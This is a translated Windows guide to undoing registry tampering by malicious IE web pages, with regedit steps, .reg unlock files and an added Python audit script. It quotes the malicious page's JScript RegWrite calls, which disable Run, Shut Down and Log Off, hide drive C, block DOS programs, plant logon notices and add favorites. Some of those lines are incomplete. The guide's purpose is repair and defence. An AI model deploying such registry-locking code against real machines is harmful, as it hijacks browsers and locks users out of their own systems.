Recovering after being hit by a malicious website: the complete registry guide, part six

Source: Internet
Author: User


Why the registry gets modified, and how to fix it

A malicious web page is an ActiveX web file containing harmful code; the symptoms described here appear because it has maliciously altered the browser's registry settings.

1. IE's default home page was modified

The title bar at the top of the IE browser is changed to something in the style of "Welcome to visit ... website". The registry entries that were changed are:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
Changing the "Start Page" value is how the page changes IE's default home page.
① After Windows starts, click "Start" → "Run", type regedit in the "Open" field, and press "OK".
② Expand the registry to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main,
find the string value "Start Page" in the right-hand pane, and change its data to "about:blank".
③ Similarly, expand the registry to
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main,
find the string value "Start Page" in the right-hand pane, and handle it as described in ②.
④ Exit Registry Editor and restart the computer. Everything is OK!
Special case: sometimes IE's start page becomes a certain URL and, even if you change the setting through IE's options, it reverts to that web site after a restart, which is very troublesome. What has happened is that a self-starting program was added to your machine; every time the system starts, it sets your IE start page back to that site.
Workaround: Run Registry Editor (regedit.exe), expand the key
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
and delete the registry.exe entry under it, then delete the program file C:\Program Files\registry.exe, and finally reset the start page from IE's options.

2. IE's default page was tampered with

On some machines the IE start page has been changed and clicking "Use Default" has no effect, because the default page behind the start page setting has been tampered with as well. The following registry value was modified:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL
The data of the "Default_Page_URL" value is the default page used for the start page.
Solution:
Change the web site URL stored in the "Default_Page_URL" value.

3. IE's default home page is modified and the settings are locked so the user cannot change them back

The main change is to the following values in IE's policy settings in the registry (a DWORD value of 1 makes the option unavailable):
[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Settings"=dword:1
"Links"=dword:1
"SecAddSites"=dword:1
Workaround: Change the DWORD values above to "0" to restore the function.

4. IE's home page setting is grayed out and cannot be changed

This happens because the DWORD value "HomePage" under HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel was modified. The original value is "0"; it was changed to "1" (the grayed-out, unselectable state).
Workaround: Change the "HomePage" value back to "0".

5. IE's title bar was modified

By default the application itself supplies the title bar text, but users are also allowed to add text through a registry value, and some malicious websites take advantage of this: they change the string value "Window Title" to their website name or to advertising text, which changes the title bar of the visitor's IE.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title
Solution:
① After Windows starts, click "Start" → "Run", type regedit in the "Open" field, and press "OK".
② Expand the registry to
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main, find the string value "Window Title" in the right-hand pane, and either delete it or change its data to "IE browser" or any other name you like.
③ Similarly, expand the registry to
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main and handle it as described in ②.
④ Exit Registry Editor, restart the computer, and run IE.

6. IE's right-click menu was modified

The registry entries that were modified are:
New entries carrying the web page's advertising are created under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt, so they appear in IE's right-click menu!
Workaround: Open Registry Editor, go to
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt and delete the advertising entries. Take care not to delete the entries for the download tools FlashGet and NetAnts as well; those two are normal.

7. IE's default search engine was modified

IE's toolbar has a search button that runs a web search. After tampering, clicking that search button links to the tampering web site instead. This happens because the following registry values were modified:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search\SearchAssistant
Solution:
Run Registry Editor, expand the key above, and change the data of "CustomizeSearch" and "SearchAssistant" to the URL of a search engine.

8. A dialog box pops up when the system starts

The registry entries that were changed are:
Under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon, the strings "LegalNoticeCaption" and "LegalNoticeText" were created, where "LegalNoticeCaption" is the caption of the prompt box and "LegalNoticeText" is its text content. Because they exist, a prompt window showing the web page's advertising appears every time we log on, before the Windows desktop.
Workaround: Open Registry Editor, go to the key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon, find the two strings "LegalNoticeCaption" and "LegalNoticeText" in the right-hand pane, and delete them.

9. Registry editing is disabled after browsing a web page

This happens because the DWORD value "DisableRegistryTools" under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System was changed to "1"; restore it to "0".
Workaround: Use Notepad to create a file with the .reg extension and copy the following content into it:
REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

10. The Start menu is modified after browsing a web page

1) "Shut Down" is disabled
2) "Run" is disabled
3) "Log Off" is disabled
4) Drive C is hidden: your C drive can no longer be found!
5) Registry Editor (regedit) is disabled
6) DOS programs are disabled
7) The system is prevented from entering "real mode"
8) Running any program is prohibited

Note: The following are the tricks the web page uses to modify the victim's registry entries
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun", , "REG_BINARY");
Note: The victim's system has no "Run" item, so the user cannot use Registry Editor to modify the system registry.
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose", "REG_BINARY");
Note: The victim's system has no "Shut Down" item.
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff", "REG_BINARY");
Note: The victim's system has no "Log Off" item.
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives", "00000004", "REG_DWORD");
Note: The victim's system shows no logical drive C.
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled", "REG_BINARY");
Note: Prohibits all DOS applications from running.
Shl.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\NoRealMode", "REG_BINARY");
Note: Prevents the system from booting into "real mode" (traditional DOS mode).
Also note: The web page also modifies the following registry values so that a window is displayed when logging on to Windows (before the Microsoft Network user logon).
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeCaption", "Woo la la ...");
Note: This line sets the window title to "Woo la la ..."
Shl.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Winlogon\\LegalNoticeText", "Woo la la ...");
Note: The line above sets the text that appears in the window.
Note: The following two lines modify the registry so that every IE window on the victim's machine carries the title "Woo la la ..."
Shl.RegWrite("HKLM\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Woo la la ...");
Shl.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "Woo la la ...");
Note: With the previous line, all modifications to the victim's registry are complete!
Note: The following code is used to add its web page to the victim's favorites
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if (!FSO.FolderExists(loc))
{
    loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
    if (!FSO.FolderExists(loc))
    {
        return;
    }
}

Note: The following is the specific code that adds the web page to the favorites
Addfavlnk(loc, "Find the Feeling www.findfeel.com", "http://www.findfeel.com");

How an affected user can repair the damage:
1: For Win9x users, it is recommended to press F8 when the computer starts, choose MS-DOS mode, and use the scanreg /restore command to restore a previously backed up, normal registry.
2: For Win2000 users, copy the content below, save it as Unlock.reg, boot into Safe Mode with Command Prompt, import it with the command regedit unlock.reg, and then restart the machine.
The contents of the Unlock.reg file are as follows:
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoDriveTypeAutoRun"=dword:00000095
"NoRun"=hex:
"NoLogOff"=hex:
"NoDrives"=dword:00000000
"RestrictRun"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000000
"NoRealMode"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon]
"LegalNoticeCaption"=""
"LegalNoticeText"=""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main]
"Window Title"="IE Browser"

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Window Title"="IE Browser"
11. The right mouse button stops working in IE
After browsing a web page in IE, the right mouse button stops working: right-clicking gets no response at all!

12. The "Source" item on the View menu is disabled

Clicking "View" → "Source" in the IE window shows that the "Source" menu item has been disabled. What happened in the registry: under
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer
a "Restrictions" key was created, and under "Restrictions" two DWORD values, "NoViewSource" and "NoBrowserContextMenu", were created and set to "1".
Also in the registry, under
HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions
the two DWORD values "NoViewSource" and "NoBrowserContextMenu" were changed to "1".
Solution:
Save the following as a registry file with the .reg extension, such as Unlock.reg, double-click Unlock.reg to import it into the registry, and restart IE to return to normal.
REGEDIT4

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000

[HKEY_USERS\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Restrictions]
"NoViewSource"=dword:00000000
"NoBrowserContextMenu"=dword:00000000
Pay special attention: in your registry file Unlock.reg, "REGEDIT4" must be in capital letters and must be followed by a blank line, and there must be no space between the "T" and the "4" in "REGEDIT4", otherwise the import will do nothing! If you are a Win2000 or WinXP user, change "REGEDIT4" to Windows Registry Editor Version 5.00.
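
The lock values and hijacked strings listed in sections 1 to 12 can be checked in one pass against an exported .reg file instead of key by key in Registry Editor. The Python below is an added example, not part of the original article: the WATCH table, the functions audit and hidden_drives, and the SAMPLE export are constructed for illustration, and the input is assumed to be already-decoded text.

```python
import re

# Key-path tails and value names from this page (lock values and hijacked strings).
WATCH = {
    r"\policies\explorer": {"norun", "noclose", "nologoff", "nodrives"},
    r"\policies\system": {"disableregistrytools"},
    r"\policies\winoldapp": {"disabled", "norealmode"},
    r"\internet explorer\control panel": {"homepage", "settings", "links", "secaddsites"},
    r"\internet explorer\restrictions": {"noviewsource", "nobrowsercontextmenu"},
    r"\internet explorer\main": {"start page", "default_page_url", "window title"},
    r"\winlogon": {"legalnoticecaption", "legalnoticetext"},
}
VALUE = re.compile(r'^"([^"]+)"\s*=\s*(?:dword:([0-9a-fA-F]+)|hex:([0-9a-fA-F,]*)|"(.*)")$')

def hidden_drives(mask):
    """Decode a NoDrives bitmask: bit 0 is A:, so the page's value 4 is C:."""
    return [chr(65 + bit) for bit in range(26) if mask >> bit & 1]

def audit(reg_text):
    """Return (value name, finding) pairs: non-zero locks and non-blank strings."""
    findings, key = [], ""
    for line in map(str.strip, reg_text.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1].lower()
        elif (m := VALUE.match(line)) and any(
                key.endswith(tail) and m.group(1).lower() in names
                for tail, names in WATCH.items()):
            name, dword, hexs, text = m.groups()
            if text is not None and text.lower() not in ("", "about:blank"):
                findings.append((name, "review string: " + text))
            elif text is None:
                # dword: is plain hexadecimal; hex: is a little-endian byte list.
                value = int(dword, 16) if dword else int.from_bytes(
                    bytes.fromhex(hexs.replace(",", "")), "little")
                drives = "hides drives " + ",".join(hidden_drives(value))
                if value:
                    findings.append((name, drives if name.lower() == "nodrives" else "lock active"))
    return findings

# Constructed sample export, not taken from a real machine.
SAMPLE = r'''REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=hex:01,00,00,00
"NoDrives"=dword:00000004
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="about:blank"
"Window Title"="Woo la la ..."
'''
```

Exports in the "Windows Registry Editor Version 5.00" format are saved as UTF-16, so decode the file before passing its text to audit. A LegalNoticeCaption or LegalNoticeText finding is only a prompt to review, since administrators also set those values deliberately.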
(Source: Hotspot Network)
